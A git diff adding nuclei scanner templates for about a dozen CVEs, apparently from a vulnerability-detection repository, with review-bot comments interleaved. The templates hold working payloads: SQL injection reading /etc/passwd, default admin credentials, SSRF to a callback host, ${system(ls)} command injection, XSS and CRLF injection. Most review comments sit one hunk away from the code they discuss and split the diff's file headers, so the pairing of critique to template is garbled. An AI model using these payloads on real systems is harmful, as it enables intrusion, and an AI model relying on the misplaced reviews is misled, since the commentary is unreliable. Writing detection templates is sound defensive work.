diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml
new file mode 100644
index 0000000000..e4dff03126
--- /dev/null
+++ b/cves/2014/CVE-2014-2323.yaml
@@ -0,0 +1,21 @@
+id: CVE-2014-2323
+
+info:
+ name: Lighttpd 1.4.34 SQL injection and path traversal
+ description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
+ reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
+ author: geeknik
+ severity: critical
+ tags: cve,cve2014,sqli,lighttpd
+
+requests:
+ - raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host: [::1]' UNION SELECT '/
+
+ unsafe: true
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml
new file mode 100644
index 0000000000..8dc7b5b7e6
--- /dev/null
+++ b/cves/2016/CVE-2016-0957.yaml
@@ -0,0 +1,28 @@
+id: CVE-2016-0957
+
+info:
+ name: Adobe AEM Console Disclosure
+ author: geeknik
+ description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
+ reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+ severity: high
+ tags: cve,cve2016,adobe,aem
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/console?.css"
+ header:
+ - Authorization: "Basic YWRtaW46YWRtaW4K"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Adobe"
+ - "java.lang"
+ - "(Runtime)"
+ condition: and
diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml
new file mode 100644
index 0000000000..5b5e68d0d7
--- /dev/null
+++ b/cves/2018/CVE-2018-1000600.yaml
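Review bot: The raw request in this hunk sends no `Connection: close` header, unlike the raw request of CVE-2021-3377 in the same commit, so the scanner may hold the connection open until the server times it out; adding `Connection: close` after the `Host:` line keeps the two raw templates consistent. The blank line before `unsafe: true` is what terminates the request headers inside the `|+` block, so it must stay. The name announces "SQL injection and path traversal" while the description only covers the SQL injection; one sentence noting that the injected host name steers the vhost document root onto `/etc/passwd` (which is what the `root:[x*]:0:0:` regex checks) would make the matcher's intent clear.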
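Review bot: The `header:` key holding a list under the request in this hunk does not match the `headers:` mapping that CVE-2021-31250 in the same commit uses; if the loader does not recognise `header:`, the Authorization value is silently never sent and the template degrades to an unauthenticated GET of `/system/console?.css`. The value `YWRtaW46YWRtaW4K` also decodes to `admin:admin` followed by a newline (the trailing `K` encodes `\n`), which a strict Basic-auth parser will reject; the credential without the newline encodes as `YWRtaW46YWRtaW4=`. Suggested lines: `headers:` / `  Authorization: "Basic YWRtaW46YWRtaW4="`. The probe actually checks for a default credential on the OSGi console rather than the dispatcher filter bypass the description quotes, which the description should say so readers do not over-interpret a hit.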
@@ -0,0 +1,22 @@
+id: CVE-2018-1000600
+
+info:
+ name: Pre-auth Fully-responded SSRF
+ description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
+ reference:
+ - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
+ - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
+ author: geeknik
+ severity: medium
+ tags: cve,cve2018,jenkins,ssrf,oob
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml
new file mode 100644
index 0000000000..9b973fef67
--- /dev/null
+++ b/cves/2020/CVE-2020-24949.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-24949
+
+info:
+ name: PHPFusion 9.03.50 Remote Code Execution
+ author: geeknik
+ severity: high
+ description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+ reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
+ tags: cve,cve2020,phpfusion,rce,php
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "infusion_db.php"
\ No newline at end of file
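Review bot: The description in this hunk is missing its verb — "allows attackers to an attacker-specified URL" — so the sentence does not say what the attacker does; suggest `allows attackers to connect to an attacker-specified URL using attacker-specified credential IDs obtained through another method, capturing credentials stored in Jenkins`. The path hard-codes `admin` in `/securityRealm/user/admin/...`; the devco.re reference suggests the user segment only matters for routing, but nothing in the template says so, and a comment on the path line such as `# user segment is only used for routing, any name works — confirm` would spare the next reader from assuming an admin account is required.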
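Review bot: The description in this hunk states the flaw needs an authenticated (non-admin) user, yet the request carries no session or credentials, so the code path the description refers to may never be reached; the body match on `infusion_db.php` is then a path-disclosure warning rather than evidence of command execution, and a fully patched install that prints such a warning would match as well. The probe also asks the target to run `ls`, which is a side effect on the scanned host if the injection does work. Either state the limitation in the template, e.g. `description: ... Detection relies on an infusion_db.php path leak in the response and does not confirm command execution.`, or tie the matcher to output that only the evaluated expression can produce.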
diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml
new file mode 100644
index 0000000000..fce8b70603
--- /dev/null
+++ b/cves/2020/CVE-2020-9402.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-9402
+
+info:
+ name: Django SQL Injection
+ description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
+ reference: |
+ - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
+ - https://docs.djangoproject.com/en/3.0/releases/security/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
+ author: geeknik
+ severity: high
+ tags: cve,cve2020,django,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
+
+ matchers:
+ - type: word
+ words:
+ - "DatabaseError at"
+ - "ORA-29257:"
+ - "ORA-06512:"
+ - "Request Method:"
+ condition: and
diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml
new file mode 100644
index 0000000000..3d7e73cfbc
--- /dev/null
+++ b/cves/2021/CVE-2021-24291.yaml
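Review bot: `reference: |` in this hunk turns the three URLs into a single literal block string whose lines begin with `- `, not the YAML sequence that CVE-2018-1000600 and CVE-2021-31581 in this commit use, so any tooling that reads `reference` as a list gets one string with embedded dashes. Drop the `|` so the entries become list items: `reference:` / `  - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402` / `  - https://docs.djangoproject.com/en/3.0/releases/security/` (and the third URL likewise). The same `reference: |` form appears in CVE-2021-3377 and needs the same change. The matcher relies on Django's debug page (`DatabaseError at`, `Request Method:`), which is worth a comment since a deployment with `DEBUG = False` will not match even when the query is vulnerable.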
@@ -0,0 +1,31 @@
+id: CVE-2021-24291
+
+info:
+ name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+ author: geeknik
+ description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+ reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+ severity: medium
+ tags: cve,cve2021,xss,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "onmouseover=alert(document.domain)//"
+ - "wp-content/uploads/photo-gallery"
+ condition: and
diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml
new file mode 100644
index 0000000000..64112f9e82
--- /dev/null
+++ b/cves/2021/CVE-2021-31249.yaml
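Review bot: The request in this hunk injects into `shortcode_id`, but the description lists only `gallery_id`, `tag`, `album_id` and `theme_id` as the affected parameters, so either the description is incomplete or the probe targets a parameter the template itself does not claim is vulnerable; confirm against the wpscan reference and bring the two into line. The reflection matcher `onmouseover=alert(document.domain)//` contains neither the quote nor an angle bracket, so a response that HTML-encodes the injected `"` but echoes the rest still matches even though the attribute was never broken out of. Matching the breakout too, `- '1" onmouseover=alert(document.domain)//'`, ties the hit to an unescaped reflection and cuts false positives on sites that do encode.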
@@ -0,0 +1,26 @@
+id: CVE-2021-31249
+
+info:
+ name: CHIYU TCP/IP Converter devices - CRLF injection
+ author: geeknik
+ description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+ severity: medium
+ tags: cve,cve2021,chiyu,crlf,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ part: header
+ words:
+ - "Location: setting.htm"
+ - ""
+ condition: and
diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml
new file mode 100644
index 0000000000..f03536d032
--- /dev/null
+++ b/cves/2021/CVE-2021-31250.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-31250
+
+info:
+ name: CHIYU IoT XSS
+ author: geeknik
+ description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+ severity: medium
+ tags: cve,cve2021,chiyu,xss,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
+ headers:
+ Authorization: "Basic OmFkbWlu"
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ - type: word
+ part: body
+ words:
+ - "\">"
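Review bot: The empty entry `- ""` under `words:` in this hunk matches every response, so under `condition: and` it adds nothing and should be removed. More importantly, `Location: setting.htm` is exactly what the device answers to an ordinary `redirect=setting.htm` request, so a 302 carrying that header does not by itself show that the `%0d%0a%0d%0a` sequence reached the response; if the reference shows what the injected break produces, match that instead. The query string also carries apply-style parameters (`type=dev_name_apply`, `TF_ip0` to `TF_ip3`, `B_mac_apply=APPLY`) that look like they write settings on the converter; if they do, a routine scan could reconfigure a live device, so this should be confirmed against the reference and, where possible, replaced with a CGI that only reads. The same pattern (`type=ap_tcps_apply`, `B_apply=APPLY`) appears in the CVE-2021-31250 request that follows.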
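Review bot: The body matcher `"\">"` in this hunk is the two characters `">`, which occur in practically any HTML document, so with `matchers-condition: and` the template fires on any `text/html` page the endpoint returns after the redirect. The request injects `<script>alert({{randstr}})</script>`, so the matcher should look for that reflected payload, e.g. `- "<script>alert({{randstr}})</script>"`, after confirming that matcher words expand `{{randstr}}` in the nuclei version in use; otherwise use one fixed marker in both the path and the matcher. `Basic OmFkbWlu` decodes to an empty username with password `admin`; a comment on that line saying whether the empty user is intentional would stop it being "fixed" into something that no longer authenticates.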
diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml
new file mode 100644
index 0000000000..d1ae4aeb7e
--- /dev/null
+++ b/cves/2021/CVE-2021-31581.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-31581
+
+info:
+ name: Akkadian Provisioning Manager MariaDB Credentials
+ author: geeknik
+ reference:
+ - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
+ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
+ severity: medium
+ tags: cve,cve2021,akkadian,mariadb,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pme/database/pme/phinx.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "host:"
+ - "name:"
+ - "pass:"
+ condition: and
diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml
new file mode 100644
index 0000000000..0426b0eee2
--- /dev/null
+++ b/cves/2021/CVE-2021-33221.yaml
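Review bot: The `info` block in this hunk has no `description:`, unlike every other template in this commit. A one-sentence description that stays within what the request and matcher show would do, e.g. `description: Akkadian Provisioning Manager serves its phinx.yml database configuration at /pme/database/pme/phinx.yml without authentication; the host, name and pass entries it contains disclose the MariaDB credentials.` The word matcher on `host:`, `name:` and `pass:` is sensible for a YAML file, but those three words also appear in ordinary HTML pages; a `part: header` check that the response is not `text/html` would keep a catch-all 200 page from matching.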
@@ -0,0 +1,32 @@
+id: CVE-2021-33221
+
+info:
+ name: CommScope Ruckus IoT Controller Unauthenticated Service Details
+ author: geeknik
+ description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+ reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+ severity: medium
+ tags: cve,cve2021,commscope,ruckus,debug
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/service/v1/service-details"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - type: word
+ words:
+ - "message"
+ - "ok"
+ - "data"
+ - "dns"
+ - "gateway"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
new file mode 100644
index 0000000000..74213022a3
--- /dev/null
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-3377
+
+info:
+ name: Ansi_up XSS
+ description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
+ reference: |
+ - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+ - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+ author: geeknik
+ severity: medium
+
+requests:
+ - raw:
+ - |+
+ GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "com\"/onmouseover=\"alert(1)\">"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml
new file mode 100644
index 0000000000..cdb7130cd7
--- /dev/null
+++ b/cves/2021/CVE-2021-33904.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-33904
+
+info:
+ name: Accela Civic Platform 21.1 - 'servProvCode' XSS
+ author: geeknik
+ description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
+ reference: https://www.exploit-db.com/exploits/49980
+ severity: medium
+ tags: cve,cve2021,accela,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
+ - 'servProvCode'
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
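Review bot: The `info` block in this hunk has no `tags:` line, which every other template in this commit carries and which the repository uses for template selection; following the convention of the sibling files, `tags: cve,cve2021,xss,ansi_up` (adjust the product token to whatever the index expects) should be added after `severity`. The request line sits inside a `|+` literal block scalar, where `\u001B` and `\u0007` are six plain characters each, not the ESC and BEL bytes the ansi_up hyperlink syntax needs; unless nuclei unescapes raw requests, the server receives the literal text and the reflection the matcher waits for never occurs, so confirm the intended bytes reach the wire and, if not, express them in a form the loader turns into control characters. The `reference: |` block-string issue noted on CVE-2020-9402 applies here as well.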